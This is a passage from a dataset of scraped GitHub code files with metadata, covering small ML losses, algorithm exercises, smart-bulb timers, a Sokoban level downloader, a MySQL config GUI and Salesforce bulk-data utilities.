all_tests=True)\n","repo_name":"krzychsol/Algorithms-and-Data-Structures","sub_path":"Offline/off7/zad7.py","file_name":"zad7.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"43285129823","text":"from keras.losses import mean_absolute_error\nimport keras.backend as K\n\n\ndef ssim(x, y):\n    c1 = 0.01 ** 2\n\n    c2 = 0.03 ** 2\n\n    mu_x = K.mean(x, axis=-1)\n\n    mu_y = K.mean(y, axis=-1)\n\n    sigma_x = K.mean(x ** 2, axis=-1) - mu_x ** 2\n\n    sigma_y = K.mean(y ** 2, axis=-1) - mu_y ** 2\n\n    sigma_xy = K.mean(x * y, axis=-1) - mu_x * mu_y\n\n    ssim_n = (2 * mu_x * mu_y + c1) * (2 * sigma_xy + c2)\n\n    ssim_d = (mu_x ** 2 + mu_y ** 2 + c1) * (sigma_x + sigma_y + c2)\n\n    ssim_out = ssim_n / ssim_d\n\n    return K.clip((1 - ssim_out) / 2, 0, 1)\n\n\ndef photometric_consistency_loss(alpha):\n    def loss(y_true, y_pred):\n        return alpha * ssim(y_true, y_pred) + (1 - alpha) * mean_absolute_error(y_true, y_pred)\n\n    return loss\n
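\n# Illustrative usage sketch (added commentary, not part of the original file):\n# the factory returns a Keras-compatible loss function, e.g.\n#   model.compile(optimizer=\"adam\", loss=photometric_consistency_loss(alpha=0.85))\n# where alpha trades the SSIM term off against the mean-absolute-error term.\n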
","repo_name":"maj-personal-repos/UnDeepVO","sub_path":"losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":102,"dataset":"github-code","pt":"37"}
{"seq_id":"36340776394","text":"#// https://docs.python.org/3.6/tutorial/datastructures.html#nested-list-comprehensions\n\n\nmatrix = [\n    [1, 2, 3, 4],\n    [5, 6, 7, 8],\n    [9, 10, 11, 12],\n]\n\n# transpose the 3x4 matrix: build one list per column\n[[row[i] for row in matrix] for i in range(4)]\n\n# the idiomatic equivalent (yields tuples instead of lists)\nlist(zip(*matrix))\n\n\n","repo_name":"yangsg/linux_training_notes","sub_path":"python3/basic02_syntax/datatype_list.py.demo/nested-list-comprehensions.py","file_name":"nested-list-comprehensions.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"29838828511","text":"from sklearn.model_selection import train_test_split\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\n# Split the data into training and testing sets\r\nX = sales_data.drop(['sales', 'date'], axis=1)\r\ny = sales_data['sales']\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\r\n\r\n# Train and evaluate models\r\nlinear_reg_model = LinearRegression()\r\nlinear_reg_model.fit(X_train, y_train)\r\nlinear_reg_pred = linear_reg_model.predict(X_test)\r\nlinear_reg_rmse = mean_squared_error(y_test, linear_reg_pred, squared=False)\r\n\r\nrandom_forest_model = RandomForestRegressor()\r\nrandom_forest_model.fit(X_train, y_train)\r\nrandom_forest_pred = random_forest_model.predict(X_test)\r\nrandom_forest_rmse = mean_squared_error(y_test, random_forest_pred, squared=False)\r\n","repo_name":"abinash0509/Oibsip_Taskno-Data-Science","sub_path":"Sales Predict/model selection.py","file_name":"model selection.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"22302906553","text":"#writeexcel.py\r\nfrom openpyxl import Workbook\r\n\r\nexcelfile = Workbook() # create an Excel file from Python\r\n\r\nsheet = excelfile.active # select the currently open worksheet\r\n\r\nsheet['C3'] = 'Hello'\r\n\r\nsheet.cell(row=3,column=4).value = 'world'\r\n\r\n#data = ['Uncle',100,'100']\r\n#sheet.append(data)\r\n\r\nexcelfile.save('Result.xlsx')\r\nprint('Done!')\r\n\r\n","repo_name":"UncleEngineer/python-excel","sub_path":"writeexcel.py","file_name":"writeexcel.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"th","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"}
{"seq_id":"20386359662","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nINF = int(1e9)\r\n\r\n# n is the number of cities, m is the number of routes\r\nn,m = map(int, input().split())\r\n\r\nedges = []\r\n\r\ndistance = [INF] * (n+1)\r\n\r\nfor _ in range(m) :\r\n    a, b, c = map(int, input().split())\r\n    edges.append((a,b,c))\r\n\r\ndef bellmanFord(start) :\r\n    distance[start] = 0\r\n    \r\n    for i in range(n) :\r\n        for cur,nextNode,cost in edges :\r\n            if distance[cur] != INF and distance[nextNode] > distance[cur] + cost :\r\n                distance[nextNode] = distance[cur] + cost\r\n                if i == n-1 : # an edge still relaxes on the n-th pass, so a negative cycle exists\r\n                    return True\r\n    return False\r\n\r\nstartNode = 1\r\n\r\nnegative_cycle = bellmanFord(startNode) \r\n\r\n\r\n\r\nif negative_cycle :\r\n    print('-1')\r\nelse : \r\n    for i in range(startNode+1,len(distance),1) :\r\n        if distance[i] == INF :\r\n            print('-1')\r\n        else :\r\n            print(distance[i])\r\n\r\n\r\n\r\n","repo_name":"yundevingV/Algorithm_","sub_path":"백준/Gold/11657. 타임머신/타임머신.py","file_name":"타임머신.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"24360831971","text":"# Baekjoon \"Alphabet Diamond\" https://www.acmicpc.net/problem/1262\n\nimport sys\nimport string\n\ndef distance(r,c,center_r, center_c) :\n    return abs(r-center_r) + abs(c-center_c)\n\nn,r1,c1,r2,c2 = map(int,sys.stdin.readline().split(' '))\nalpha = string.ascii_lowercase\n\nr,c = n-1,n-1\nfor i in range(r1,r2+1) :\n    tmp_str = ''\n    for j in range(c1,c2+1):\n        dstns = distance(i%(2*n-1),j%(2*n-1),r,c)\n        tmp_str += alpha[dstns%26] if dstns < n else '.'\n    print(tmp_str)\n","repo_name":"csw180/coding_py","sub_path":"boj_1262.py","file_name":"boj_1262.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"74861716587","text":"\"\"\"\nhttps://practice.geeksforgeeks.org/problems/finding-middle-element-in-a-linked-list/1#\n\"\"\"\n\n#Approach 1\n\n\"\"\"\nTraverse the whole linked list and count the no. of nodes. Now traverse the list again till count/2 and return the node at count/2. 
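\nA minimal two-pass sketch of Approach 1 (illustrative addition, not part of the\noriginal solution; the helper name findMidTwoPass is hypothetical):\n\n    def findMidTwoPass(head):\n        count = 0\n        node = head\n        while node:\n            count += 1\n            node = node.next\n        node = head\n        for _ in range(count // 2):\n            node = node.next\n        return node.data\n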
\n\"\"\"\n\n#Approach 2\n#TC:O(n)\n#SC:O(1)\ndef findMid(head):\n slow = head\n fast = head\n \n while fast and fast.next :\n slow = slow.next\n fast = fast.next.next\n return slow.data\n","repo_name":"DIVYANSHU-CHAUDHARI/DSA-Library","sub_path":"LinkedList/Find Middle element.py","file_name":"Find Middle element.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39672451844","text":"#!/usr/bin/env python\n\n\"\"\"This is an example script that can be used to set on and off timers based on the sunrise/sunset times.\n\nSpecifically, it will set times on an outside porch light\nto turn on at dusk and off at dawn. It will set the timers for\ninside light to turn on at sunset, and off at a fixed time.\n\nA script like this is best used with an /etc/crontab entry that might\nrun every day or every few days. For example:\n-----------------\n\n# Sync up the bulb clocks a few times a day, in case of manual power toggles\n00 3,12,17,22 * * * username /path/to/scripts/flux_led.py -Ss --setclock\n\n# Set the sun timers everyday at 3am\n00 3 * * * username /path/to/scripts/sun_timers.py\n\n\n-----------------\n\nThe python file with the Flux LED wrapper classes should live in\nthe same folder as this script\n\"\"\"\nimport datetime\nimport os\nimport sys\nimport syslog\n\nfrom flux_led import BulbScanner, LedTimer, WifiLedBulb\n\ntry:\n from astral import Astral\nexcept ImportError:\n print(\"Error: Need to install python package: astral\")\n sys.exit(-1)\n\n\nthis_folder = os.path.dirname(os.path.realpath(__file__))\nsys.path.append(this_folder)\n\ndebug = False\n\n\ndef main():\n syslog.openlog(sys.argv[0])\n\n # Change location to nearest city.\n location = \"San Diego\"\n\n # Get the local sunset/sunrise times\n a = Astral()\n a.solar_depression = \"civil\"\n city = a[location]\n timezone = city.timezone\n sun = city.sun(date=datetime.datetime.now(), local=True)\n\n if debug:\n print(f\"Information for {location}/{city.region}\\n\")\n print(f\"Timezone: {timezone}\")\n\n print(\n \"Latitude: {:.02f}; Longitude: {:.02f}\\n\".format(\n city.latitude, city.longitude\n )\n )\n\n print(\"Dawn: {}\".format(sun[\"dawn\"]))\n print(\"Sunrise: {}\".format(sun[\"sunrise\"]))\n print(\"Noon: {}\".format(sun[\"noon\"]))\n print(\"Sunset: {}\".format(sun[\"sunset\"]))\n print(\"Dusk: {}\".format(sun[\"dusk\"]))\n\n # Find the bulbs on the LAN\n scanner = BulbScanner()\n scanner.scan(timeout=4)\n\n # Specific ID/MAC of the bulbs to set\n porch_info = scanner.getBulbInfoByID(\"ACCF235FFFEE\")\n livingroom_info = scanner.getBulbInfoByID(\"ACCF235FFFAA\")\n\n if porch_info:\n bulb = WifiLedBulb(porch_info[\"ipaddr\"])\n bulb.refreshState()\n\n timers = bulb.getTimers()\n\n # Set the porch bulb to turn on at dusk using timer idx 0\n syslog.syslog(\n syslog.LOG_ALERT,\n \"Setting porch light to turn on at {}:{:02d}\".format(\n sun[\"dusk\"].hour, sun[\"dusk\"].minute\n ),\n )\n dusk_timer = LedTimer()\n dusk_timer.setActive(True)\n dusk_timer.setRepeatMask(LedTimer.Everyday)\n dusk_timer.setModeWarmWhite(35)\n dusk_timer.setTime(sun[\"dusk\"].hour, sun[\"dusk\"].minute)\n timers[0] = dusk_timer\n\n # Set the porch bulb to turn off at dawn using timer idx 1\n syslog.syslog(\n syslog.LOG_ALERT,\n \"Setting porch light to turn off at {}:{:02d}\".format(\n sun[\"dawn\"].hour, sun[\"dawn\"].minute\n ),\n )\n dawn_timer = LedTimer()\n dawn_timer.setActive(True)\n dawn_timer.setRepeatMask(LedTimer.Everyday)\n 
dawn_timer.setModeTurnOff()\n dawn_timer.setTime(sun[\"dawn\"].hour, sun[\"dawn\"].minute)\n timers[1] = dawn_timer\n\n bulb.sendTimers(timers)\n\n else:\n print(\"Can't find porch bulb\")\n\n if livingroom_info:\n bulb = WifiLedBulb(livingroom_info[\"ipaddr\"])\n bulb.refreshState()\n\n timers = bulb.getTimers()\n\n # Set the living room bulb to turn on at sunset using timer idx 0\n syslog.syslog(\n syslog.LOG_ALERT,\n \"Setting LR light to turn on at {}:{:02d}\".format(\n sun[\"sunset\"].hour, sun[\"sunset\"].minute\n ),\n )\n sunset_timer = LedTimer()\n sunset_timer.setActive(True)\n sunset_timer.setRepeatMask(LedTimer.Everyday)\n sunset_timer.setModeWarmWhite(50)\n sunset_timer.setTime(sun[\"sunset\"].hour, sun[\"sunset\"].minute)\n timers[0] = sunset_timer\n\n # Set the living room bulb to turn off at a fixed time\n off_timer = LedTimer()\n off_timer.setActive(True)\n off_timer.setRepeatMask(LedTimer.Everyday)\n off_timer.setModeTurnOff()\n off_timer.setTime(23, 30)\n timers[1] = off_timer\n\n bulb.sendTimers(timers)\n else:\n print(\"Can't find living room bulb\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Danielhiversen/flux_led","sub_path":"examples/sun_timers_example.py","file_name":"sun_timers_example.py","file_ext":"py","file_size_in_byte":4580,"program_lang":"python","lang":"en","doc_type":"code","stars":145,"dataset":"github-code","pt":"37"} +{"seq_id":"32900484445","text":"import os\r\nimport subprocess\r\nfrom connectFunction import *\r\nglobal lastlayer\r\n\r\n\r\ndef residualBlock(file,filters):\r\n global lastLayer\r\n lasto=getLastlayer()\r\n \r\n addconv2d(file,0,filters,3,3,1,1,1)\r\n addBatchNorm(file,0,0.999,0.000011)\r\n addrelu(file,0)\r\n addconv2d(file,0,filters,3,3,1,1,1)\r\n addBatchNorm(file,0,0.999,0.000011)\r\n addAdd(file,lasto-getLastlayer())\r\n addrelu(file,0)\r\n \r\ndef residualBlockFirst(file,filters,strides):\r\n global lastLayer\r\n addconv2d(file,0,filters,3,3,strides,1,1)\r\n lasto=lastlayer\r\n addBatchNorm(file,0,0.999,0.000011)\r\n addrelu(file,0)\r\n addconv2d(file,0,filters,3,3,1,1,1)\r\n addBatchNorm(file,0,0.999,0.000011)\r\n addAdd(file,lasto-lastlayer)\r\n addrelu(file,0)\r\ndef createNN(file,out):\r\n filters = [64, 64, 128, 256, 512]\r\n kernels = [7, 3, 3, 3, 3]\r\n strides = [2, 1, 2, 2, 2]\r\n \r\n addconv2d(file,0,filters[0],kernels[0],kernels[0],strides[0],3,1)\r\n addBatchNorm(file,0,0.999,0.000011)\r\n addrelu(file,0)\r\n addpoolmax(file,0,3,2,1)\r\n \r\n residualBlock(file,filters[0])\r\n residualBlock(file,filters[0])\r\n residualBlockFirst(file,filters[2],strides[2])\r\n residualBlock(file,filters[2])\r\n residualBlockFirst(file,filters[3],strides[3])\r\n residualBlock(file,filters[3])\r\n residualBlockFirst(file,filters[4],strides[4])\r\n residualBlock(file,filters[4])\r\n adddropout(file,0,0.5)\r\n addFully(file,0,500)\r\n addrelu(file,0)\r\n addEnd(file,out)\r\n \r\ndef create_file(filename,batch,cha,hei,wei,traSam,testSam,out,leaRat,mom,leaDec):\r\n file=open(filename,\"w+\")\r\n global lastlayer\r\n lastlayer=0\r\n firstVal(file,batch,cha,hei,wei,traSam,testSam,out,leaRat,mom,leaDec)\r\n createNN(file,out)\r\n file.close()\r\n \r\nfilename = \"resnet18.ini\"\r\n## filename,batchSize,inputChanal,inputHeigth,inputWeigth,trainingSample,\r\n#testSample,outChanal,learningRate,momentum,learningDecay\r\ncreate_file(filename,1000,3,32,32,50000,10000,10,0.01,0.95,0.0)\r\nos.system(\"AkaCudnNet.exe 
\"+filename)\r\n","repo_name":"mdAhmetKemal/AkaCudnNet","sub_path":"tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20353138156","text":"\"\"\"A simple example for a few types and keywords\"\"\"\n\nfrom math import pi, floor\n\nCONST = 4\nstr_ = \"abcde\"\n\n# calculate output\noutput = str_ * CONST + str(2) * floor(pi)\n\n# Fira Code tests:\n# r 0 @ & * == === != !==\n\nprint(output)\n","repo_name":"zandivx/protokoll_template","sub_path":"template.latex/input/python_example.py","file_name":"python_example.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18089936249","text":"# importing libraries \nimport sys \n\nfrom PyQt5.QtWidgets import * \nfrom PyQt5.QtGui import * \nfrom PyQt5.QtCore import * \n\nfrom Room import Room\nimport LivingRoom\nfrom Bedroom import Bedroom\nfrom Bathroom import Bathroom \nimport config\n\nclass Hallway(Room):\n \"\"\"\n Bedroom window to pop up when player navigates to the Bedroom Location\n \"\"\"\n def __init__(self):\n super().__init__(\"Hallway\")\n\n self.setRoomButtons()\n self.setInteractionButtons()\n self.setEasterEggButtons()\n\n def setRoomButtons(self):\n # Setting up buttons and other room windows\n self.lr = None\n self.livingButton = QPushButton(\"Living Room\", self)\n self.livingButton.setGeometry(self.width/2-self.button_width/2,self.image_height-self.button_height,self.button_width,self.button_height)\n self.livingButton.clicked.connect(self.toLiving)\n\n self.br = None\n self.bedroomButton = QPushButton(\"Bedroom\", self)\n self.bedroomButton.setGeometry(self.width-self.button_width,self.image_height/2-self.button_height/2,self.button_width,self.button_height)\n self.bedroomButton.clicked.connect(self.toBedroom)\n\n self.bh = None\n self.bathroomButton = QPushButton(\"Bathroom\", self)\n self.bathroomButton.setGeometry(self.left,self.image_height/2-self.button_height/2,self.button_width,self.button_height)\n self.bathroomButton.clicked.connect(self.toBathroom)\n\n def setInteractionButtons(self):\n bw = 25\n bh = 25\n\n def setEasterEggButtons(self):\n # Setting up easter egg buttons\n pass\n\n def toLiving(self, checked):\n config.progress.rooms_visited += 1\n if self.lr is None:\n self.lr = LivingRoom.LivingRoom()\n self.lr.show()\n else:\n self.lr.close() # Close window.\n self.lr = None # Discard reference.\n self.close()\n\n def toBedroom(self, checked):\n config.progress.rooms_visited += 1\n if self.br is None:\n self.br = Bedroom()\n self.br.show()\n else:\n self.br.close() # Close window.\n self.br = None # Discard reference.\n\n self.close()\n\n def toBathroom(self, checked):\n config.progress.rooms_visited += 1\n if self.bh is None:\n self.bh = Bathroom()\n self.bh.show()\n else:\n self.bh.close() # Close window.\n self.bh = None # Discard reference.\n","repo_name":"HagenFritz/nancy-drew-forced-quarantine","sub_path":"src/Hallway.py","file_name":"Hallway.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"72379346667","text":"import glob\nimport os\nimport zipfile\n\nimport numpy as np\nimport requests\n\nBOXOBAN_URL = \"https://github.com/deepmind/boxoban-levels/archive/master.zip\"\n\n\ndef boxoban_level_generator(levels_set=\"unfiltered\", data_split=\"valid\"):\n env = 
Boxoban(levels_set=levels_set, data_split=data_split)\n while True:\n index = np.random.randint(0, env.num_levels-1)\n yield env.levels[index]\n\n\nclass Boxoban(object):\n \"\"\"Class for loading and generatting Boxoban levels.\"\"\"\n\n def __init__(self,\n levels_set=\"unfiltered\",\n data_split=\"valid\"):\n self._levels_set = levels_set\n self._data_split = data_split\n self._levels = []\n\n data_file_path_local = os.path.join(os.path.dirname(__file__),\n \"boxoban_cache\",\n \"{}_{}.npz\".format(self._levels_set,\n self._data_split))\n\n data_file_path_global = os.path.join(\"/tmp/boxoban_cache\",\n \"{}_{}.npz\".format(self._levels_set,\n self._data_split))\n\n if os.path.exists(data_file_path_local):\n self.levels = np.load(data_file_path_local)[\"levels\"]\n elif os.path.exists(data_file_path_global):\n self.levels = np.load(data_file_path_global)[\"levels\"]\n else:\n self.levels = self.get_data()\n self.num_levels = len(self.levels)\n\n def get_data(self):\n \"\"\"Downloads and cache the data.\"\"\"\n try:\n cache_path = os.path.join(\n os.path.dirname(__file__), \"boxoban_cache\")\n os.makedirs(cache_path, exist_ok=True)\n except PermissionError:\n cache_path = os.path.join(\"/tmp/boxoban_cache\")\n if not os.path.exists(cache_path):\n os.makedirs(cache_path, exist_ok=True)\n\n # Get the zip file\n zip_file_path = os.path.join(cache_path, \"master.zip\")\n if not os.path.exists(zip_file_path):\n response = requests.get(BOXOBAN_URL, stream=True)\n handle = open(zip_file_path, \"wb\")\n for chunk in response.iter_content(chunk_size=512):\n if chunk:\n handle.write(chunk)\n handle.close()\n\n with zipfile.ZipFile(zip_file_path, \"r\") as zipref:\n zipref.extractall(cache_path)\n\n # convert to npz\n path = os.path.join(cache_path, \"boxoban-levels-master\",\n self._levels_set,\n self._data_split)\n files = glob.glob(path + \"/*.txt\")\n levels = \"\".join([open(f, \"r\").read() for f in files])\n levels = levels.split(\"\\n;\")\n levels = [\"\\n\".join(item.split(\"\\n\")[1:]) for item in levels]\n levels = np.asarray(levels)\n data_file_path = os.path.join(\n cache_path, \"{}_{}.npz\".format(self._levels_set, self._data_split))\n np.savez(data_file_path, levels=levels)\n return levels\n","repo_name":"deepmind/deepmind-research","sub_path":"physics_planning_games/mujoban/boxoban.py","file_name":"boxoban.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","stars":11900,"dataset":"github-code","pt":"37"} +{"seq_id":"32795356401","text":"import os\nimport pymysql.cursors\nimport PySimpleGUI as sg\nimport ipget\n\n\nlayout1 = [\n [sg.Text('データベースIPアドレス入力画面')],\n [sg.Text('データベースのIPアドレス', size=(22,1)), sg.InputText('172.30.8.14')],\n [sg.Submit(button_text='接続')]]\n\nroomlist=[]\ncameralist=[\"0\",\"1\",\"2\"]\nlayout2 = [\n [sg.Text('COCOVision-Config')],\n [sg.Text('部屋名', size=(15, 1)),sg.Combo((roomlist),readonly=True,default_value=\"部屋一覧\",size=(20, 1))],\n [sg.Text('カメラ接続個数', size=(15, 1)),sg.Combo((cameralist),readonly=True,default_value=\"0\",size=(20, 1))],\n [sg.Submit(button_text='適用')]]\n\n\ndef showWin1():\n win1 = sg.Window('COCOVision-Config', layout1)\n while True:\n event, values = win1.read()\n if event is None: break\n if event == '接続':\n try:\n connection = pymysql.connect(host=values[0],\n user='recorder',\n password='th1117',\n db='cocovision',\n charset='utf8')\n sg.popup('接続しました')\n win1.close()\n return connection,values[0]\n except Exception as e:\n sg.popup('接続に失敗しました:'+str(e))\n\ndef showWin2(connection,dbip):\n 
try: # get the room list\n        cursor = connection.cursor()\n        cursor.execute(\"select room_name from room_info;\")\n        result=cursor.fetchall()\n        for row in result:\n            roomlist.append(str(row[0]))\n    except:\n        sg.popup('接続できませんでした、もう一度入力してください')\n    \n    win2 = sg.Window('COCOVision-Config', layout2)\n    while True:\n        event, values = win2.read()\n        if event is None: break\n        if event == '適用':\n            if values[0]==\"部屋一覧\":\n                sg.popup('部屋を選択してください')\n            else:\n                setupCnf(values,dbip,cursor)\n                setupDb(connection,values)\n                win2.close()\n\ndef setupCnf(values,dbip,cursor):\n    path = os.getcwd()\n    room_name=values[0]\n    camera=values[1]\n    with open(path+\"/config/COCOVision.config\", \"w\") as f:\n        f.write(room_name+\"\\n\"+str(camera)+\"\\n\"+dbip)\n\n\ndef setupDb(connection,values):\n    try: # connect to the MySQL database\n        cursor=connection.cursor()\n        ip = str(ipget.ipget().ipaddr(\"wlan0\")).split('/')\n        sql = '''update room_info set device_ip_address=%(ip)s,num_camera=%(camera)s where room_name=%(room)s;'''\n        into ={'ip':ip[0],'camera':values[1],'room':values[0]}\n        cursor.execute(sql,into)\n        connection.commit()\n        cursor.close()\n        sg.popup('適用しました')\n    except: # error message when the connection fails\n        print(\"データベースへの登録に失敗しました\")\n        sg.popup('データベースへの登録に失敗しました')\n\n\n\n# start task\nreWin1=showWin1()\nshowWin2(reWin1[0],reWin1[1])\n","repo_name":"REM-Project/COCOVision","sub_path":"recorder/cocovision/COCOVision-setup.py","file_name":"COCOVision-setup.py","file_ext":"py","file_size_in_byte":3066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"14548389754","text":"import datetime\nimport itertools\n\nfrom sqlalchemy import types\nfrom sqlalchemy import event\nfrom sqlalchemy import Column\nfrom sqlalchemy import Integer\nfrom sqlalchemy import Table\nfrom sqlalchemy import Unicode\nfrom sqlalchemy.orm import mapper\n\nfrom cumulusci.core.exceptions import BulkDataException\nfrom cumulusci.utils import convert_to_snake_case\n\n\ndef batch_iterator(iterator, n=10000):\n    while True:\n        batch = list(itertools.islice(iterator, n))\n        if not batch:\n            return\n\n        yield batch\n\n\ndef get_lookup_key_field(lookup, sf_field):\n    return lookup.get(\"key_field\") or convert_to_snake_case(sf_field)\n\n\n# Create a custom sqlalchemy field type for sqlite datetime fields which are stored as integer of epoch time\nclass EpochType(types.TypeDecorator):\n    impl = types.Integer\n\n    epoch = datetime.datetime(1970, 1, 1, 0, 0, 0)\n\n    def process_bind_param(self, value, dialect):\n        return int((value - self.epoch).total_seconds()) * 1000\n\n    def process_result_value(self, value, dialect):\n        if value is not None:\n            return self.epoch + datetime.timedelta(seconds=value / 1000)\n
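\n\n# Illustrative note (added, not part of the original file): with this mapping,\n# datetime.datetime(1970, 1, 1, 0, 0, 1) round-trips through the column as 1000,\n# i.e. milliseconds since the epoch.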
\n\n\n# Listen for sqlalchemy column_reflect event and map datetime fields to EpochType\n@event.listens_for(Table, \"column_reflect\")\ndef setup_epoch(inspector, table, column_info):\n    if isinstance(column_info[\"type\"], types.DateTime):\n        column_info[\"type\"] = EpochType()\n\n\nclass SqlAlchemyMixin:\n    def _sql_bulk_insert_from_records(\n        self, *, connection, table, columns, record_iterable\n    ):\n        \"\"\"Persist records from the given generator into the local database.\"\"\"\n        table = self.metadata.tables[table]\n\n        connection.execute(\n            table.insert(), [dict(zip(columns, row)) for row in record_iterable]\n        )\n\n        self.session.flush()\n\n    def _create_record_type_table(self, table_name):\n        \"\"\"Create a table to store mapping between Record Type Ids and Developer Names.\"\"\"\n        rt_map_model_name = f\"{table_name}Model\"\n        self.models[table_name] = type(rt_map_model_name, (object,), {})\n        rt_map_fields = [\n            Column(\"record_type_id\", Unicode(18), primary_key=True),\n            Column(\"developer_name\", Unicode(255)),\n        ]\n        rt_map_table = Table(table_name, self.metadata, *rt_map_fields)\n        mapper(self.models[table_name], rt_map_table)\n\n    def _extract_record_types(self, sobject, table, conn):\n        \"\"\"Query for Record Type information and persist it in the database.\"\"\"\n        self.logger.info(f\"Extracting Record Types for {sobject}\")\n        query = (\n            f\"SELECT Id, DeveloperName FROM RecordType WHERE SObjectType='{sobject}'\"\n        )\n\n        result = self.sf.query(query)\n\n        if result[\"totalSize\"]:\n            self._sql_bulk_insert_from_records(\n                connection=conn,\n                table=table,\n                columns=[\"record_type_id\", \"developer_name\"],\n                record_iterable=(\n                    [rt[\"Id\"], rt[\"DeveloperName\"]] for rt in result[\"records\"]\n                ),\n            )\n\n\ndef _handle_primary_key(mapping, fields):\n    \"\"\"Provide support for legacy mappings which used the OID as the pk; otherwise\n    default to an autoincrementing int pk and a separate sf_id column.\"\"\"\n\n    mapping[\"oid_as_pk\"] = bool(mapping.get(\"fields\", {}).get(\"Id\"))\n    if mapping[\"oid_as_pk\"]:\n        id_column = mapping[\"fields\"][\"Id\"]\n        fields.append(Column(id_column, Unicode(255), primary_key=True))\n    else:\n        fields.append(Column(\"id\", Integer(), primary_key=True, autoincrement=True))\n\n\ndef create_table(mapping, metadata):\n    \"\"\"Given a mapping data structure (from mapping.yml) and SQLAlchemy\n    metadata, create a table matching the mapping.\n\n    Mapping should be a dict-like with keys \"fields\", \"table\" and\n    optionally \"oid_as_pk\" and \"record_type\" \"\"\"\n\n    fields = []\n    _handle_primary_key(mapping, fields)\n\n    # make a field list to create\n    for field in fields_for_mapping(mapping):\n        if mapping[\"oid_as_pk\"] and field[\"sf\"] == \"Id\":\n            continue\n        fields.append(Column(field[\"db\"], Unicode(255)))\n\n    if \"record_type\" in mapping:\n        fields.append(Column(\"record_type\", Unicode(255)))\n    t = Table(mapping[\"table\"], metadata, *fields)\n    if t.exists():\n        raise BulkDataException(f\"Table already exists: {mapping['table']}\")\n    return t\n\n\ndef fields_for_mapping(mapping):\n    \"\"\"Summarize the list of fields in a table mapping\"\"\"\n    fields = []\n    for sf_field, db_field in mapping.get(\"fields\", {}).items():\n        fields.append({\"sf\": sf_field, \"db\": db_field})\n    for sf_field, lookup in mapping.get(\"lookups\", {}).items():\n        fields.append({\"sf\": sf_field, \"db\": get_lookup_key_field(lookup, sf_field)})\n    return fields\n\n\ndef generate_batches(num_records, batch_size):\n    \"\"\"Generate batch size list for splitting a number of tasks into batch jobs.\n\n    Given a number of records to split up, and a batch size, generate a\n    stream of batchsize, index pairs\"\"\"\n    num_batches = (num_records // batch_size) + 1\n    for i in range(0, num_batches):\n        if i == num_batches - 1:  # last batch\n            batch_size = num_records - (batch_size * i)  # leftovers\n        if batch_size > 0:\n            yield batch_size, i\n
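\n\n# Example (added for illustration; not part of the original file):\n#   list(generate_batches(25, 10)) == [(10, 0), (10, 1), (5, 2)]\n# i.e. two full batches of 10 and a final leftover batch of 5.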
\n\n\nclass RowErrorChecker:\n    def __init__(self, logger, ignore_row_errors, row_warning_limit):\n        self.logger = logger\n        self.ignore_row_errors = ignore_row_errors\n        self.row_warning_limit = row_warning_limit\n        self.row_error_count = 0\n\n    def check_for_row_error(self, result, row_id):\n        if not result.success:\n            msg = f\"Error on record with id {row_id}: {result.error}\"\n            if self.ignore_row_errors:\n                if self.row_error_count < self.row_warning_limit:\n                    self.logger.warning(msg)\n                elif self.row_error_count == self.row_warning_limit:\n                    self.logger.warning(\"Further warnings suppressed\")\n                self.row_error_count += 1\n                return self.row_error_count\n            else:\n                raise BulkDataException(msg)\n","repo_name":"justindixon/CumulusCI","sub_path":"cumulusci/tasks/bulkdata/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"}
{"seq_id":"41512231523","text":"#!/usr/bin/env python\nfrom __future__ import (absolute_import, division,\n                        print_function)\n\nimport click\nimport sys\n\nfrom .ops import dumps, loads\n\n\n@click.command()\n@click.argument(\n    'file',\n    type=click.Path(\n        file_okay=True,\n        dir_okay=False,\n    ),\n    required=True,\n    nargs=-1,\n)\n@click.option(\n    '--overwrite', '-o',\n    is_flag=True,\n    help=\"Whether to overwrite files, or print to stdout\",\n)\n@click.option(\n    '--indent',\n    default=2,\n    help='Number of spaces to indent',\n)\ndef cli(file, overwrite, indent):\n    \"\"\"\n    Prettifies a JSON file, or files, or stdin, by indenting and sorting.\n\n    In lieu of filenames, '-' may be used to represent stdin.\n    \"\"\"\n    if file == ('-',):\n        prettify(sys.stdin, False, indent)\n    else:\n        for path in file:\n            mode = 'r+' if overwrite else 'r'\n            fobj = open(path, mode)\n            prettify(fobj, overwrite, indent)\n\n\ndef prettify(fobj, overwrite, indent):\n    in_str = fobj.read()\n    jobj = loads(in_str)\n    if not overwrite:\n        sys.stderr.write(\"// {}:\\n\".format(fobj.name))\n    new_str = dumps(jobj, 